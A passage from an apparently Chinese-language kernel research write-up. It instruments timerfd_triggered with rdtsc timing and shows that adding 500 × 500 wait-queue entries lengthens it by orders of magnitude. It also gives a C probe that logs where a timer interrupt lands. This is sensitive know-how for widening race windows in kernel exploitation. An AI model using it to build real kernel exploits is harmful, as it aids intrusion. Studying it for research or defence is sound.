0xffffffff81b8b6b9 <+108>: call 0xffffffff810ad650 <__wake_up_locked_key>
0xffffffff81b8b6be <+113>: mov rsi,r13
0xffffffff81b8b6c1 <+116>: mov rdi,r12
0xffffffff81b8b6c4 <+119>: call 0xffffffff81bde5b0 <_raw_spin_unlock_irqrestore>
**0xffffffff81b8b6c9 <+124>: rdtsc**
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
diff --git a/fs/timerfd.c b/fs/timerfd.c
index e9c96a0c79f1..b919b24b4d48 100644
--- a/fs/timerfd.c
+++ b/fs/timerfd.c
@@ -64,11 +64,20 @@ static void timerfd_triggered(struct timerfd_ctx *ctx)
{
unsigned long flags;

+ u64 start_time, end_time;
+
+ pr_warn("[%s] %s enter\n", current->comm, __func__);
+
+ asm volatile ("rdtsc; shlq $32, %%rdx; orq %%rdx, %0"
+ : "=a"(start_time) :: "%rdx");
spin_lock_irqsave(&ctx->wqh.lock, flags);
ctx->expired = 1;
ctx->ticks++;
wake_up_locked_poll(&ctx->wqh, EPOLLIN);
spin_unlock_irqrestore(&ctx->wqh.lock, flags);
+ asm volatile ("rdtsc; shlq $32, %%rdx; orq %%rdx, %0"
+ : "=a"(end_time) :: "%rdx");
+ pr_warn("[%s] %s exit, %lld\n", current->comm, __func__, end_time - start_time);
}

系统正常运行的时候 tick 数大概在 3000 ~ 30000, 创建 500 * 500 个 entry 可以使cpu 运行时间增大 3~4 个数量级(测试虚拟机的CPU是单核 2000 MHz)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
[ 1134.053250] [swapper/0] timerfd_triggered exit, 2976
[ 1134.053250] [swapper/0] timerfd_triggered enter
[ 1134.053250] [swapper/0] timerfd_triggered exit, 3970
[ 1134.552271] [swapper/0] timerfd_triggered enter
[ 1134.552906] [swapper/0] timerfd_triggered exit, 11616
[ 1175.552958] [swapper/0] timerfd_triggered enter
[ 1175.553871] [swapper/0] timerfd_triggered exit, 32663
[ 1176.052796] [swapper/0] timerfd_triggered enter
[ 1176.053719] [swapper/0] timerfd_triggered exit, 29340
[ 1184.738834] [swapper/0] timerfd_triggered enter
**[ 1184.739757] [swapper/0] timerfd_triggered exit, 27116541 // 500 * 500
...**
[ 1588.076916] [swapper/0] timerfd_triggered enter
**[ 1588.077841] [swapper/0] timerfd_triggered exit, 28924883 // 500 * 500
...**
[ 1596.735608] [swapper/0] timerfd_triggered enter
**[ 1596.736503] [swapper/0] timerfd_triggered exit, 28029898 // 500 * 500**
..
[ 1222.384483] [swapper/0] timerfd_triggered enter
**[ 1222.385381] [swapper/0] timerfd_triggered exit, 8511668 // 100 * 500**
...
[ 1265.026284] [swapper/0] timerfd_triggered enter
**[ 1265.027208] [swapper/0] timerfd_triggered exit, 1202548 // 10 * 500**

一种观测代码被中断位置的方法

原文的附录:

I tried firing an interval timer at 100Hz (using timer_create()), with a signal handler that logs the PC register

代码实现:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <ucontext.h>
#include <sys/time.h>
#include <sys/user.h>
#include <time.h>
#include <sched.h>
#include <err.h>

/*
 * SYSCHK(x): evaluate x exactly once and yield its value.
 * If the value equals -1 (cast to x's own type), the program terminates via
 * err(1, ...) with the stringified expression "SYSCHK(<x>)" as the message.
 * Relies on the GNU statement-expression and typeof extensions.
 */
#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})

/*
 * Restrict the task identified by pid to the single CPU `cpu`.
 * Builds a one-CPU affinity mask and applies it with sched_setaffinity();
 * a failure terminates the program through SYSCHK.
 */
void pin_task_to(int pid, int cpu) {
cpu_set_t cset;
CPU_ZERO(&cset);
CPU_SET(cpu, &cset);
/* SYSCHK stringifies this call into its error message, so the expression text is part of the output. */
SYSCHK(sched_setaffinity(pid, sizeof(cpu_set_t), &cset));
}
/*
 * Pin the caller to `cpu`: forwards to pin_task_to() with pid 0, which
 * sched_setaffinity(2) documents as "the calling thread".
 */
void pin_to(int cpu)
{
    pin_task_to(0, cpu);
}

/*
 * SA_SIGINFO-style signal handler: prints the program counter (RIP) and the
 * RAX value saved in the interrupted context.
 *
 * signum and info are unused. context is the ucontext_t describing the
 * interrupted code.
 *
 * NOTE(review): printf() is not async-signal-safe. The main() shown with this
 * handler spins in inline assembly and never calls stdio itself; re-check
 * this if the handler is reused elsewhere.
 */
void timer_handler(int signum, siginfo_t *info, void *context) {
    const ucontext_t *uc = context;
    long rax_value = uc->uc_mcontext.gregs[REG_RAX];
    void *interrupted_pc = (void *) uc->uc_mcontext.gregs[REG_RIP];

    printf("Timer fired, PC = %p, rax: %ld\n", interrupted_pc, rax_value);
}

/*
 * Interrupt-position probe.
 *
 * Pins the process to CPU 0, installs timer_handler for SIGALRM, starts a
 * 100 Hz CLOCK_MONOTONIC interval timer, then spins forever in a sequence of
 * `mov $N, %rax` instructions so the handler's RAX/PC output shows where the
 * timer interrupted the loop.
 *
 * Every setup call is checked with SYSCHK: a failed timer_create() would
 * otherwise hand an uninitialized timerid to timer_settime().
 */
int main() {
    pin_to(0);

    /* Set up the signal handler for SIGALRM; SA_SIGINFO selects the three-argument handler form. */
    struct sigaction sa;
    memset(&sa, 0, sizeof(sa));
    sa.sa_flags = SA_SIGINFO;
    sa.sa_sigaction = timer_handler;
    SYSCHK(sigaction(SIGALRM, &sa, NULL));

    /* Start the timer: first expiry and period are both 10 ms. */
    struct itimerspec its;
    its.it_interval.tv_sec = 0;
    its.it_interval.tv_nsec = 10000000; // 100Hz
    its.it_value = its.it_interval;
    timer_t timerid;
    /* timer_create(2): a NULL sigevent requests the default notification, SIGALRM. */
    SYSCHK(timer_create(CLOCK_MONOTONIC, NULL, &timerid));
    SYSCHK(timer_settime(timerid, 0, &its, NULL));

    // Run a loop to generate some activity
    volatile int i;
    while (1) {
        __asm__ volatile (
            "mov $1, %%rax\n\t" // Move 1 to rax
            "mov $2, %%rax\n\t" // Move 2 to rax
            "mov $3, %%rax\n\t" // Move 3 to rax
            "mov $4, %%rax\n\t" // Move 4 to rax
            "mov $5, %%rax\n\t" // Move 5 to rax
            "mov $6, %%rax\n\t" // Move 6 to rax
            "mov $7, %%rax\n\t" // Move 7 to rax
            "mov $8, %%rax\n\t" // Move 8 to rax
            "mov $9, %%rax\n\t" // Move 9 to rax
            "mov $10, %%rax\n\t" // Move 10 to rax

            : // No output operand
            : // No input operand
            : "%rax" // Clobbered register
        );
        //i = -1; /* memory write */
    }

    return 0;
}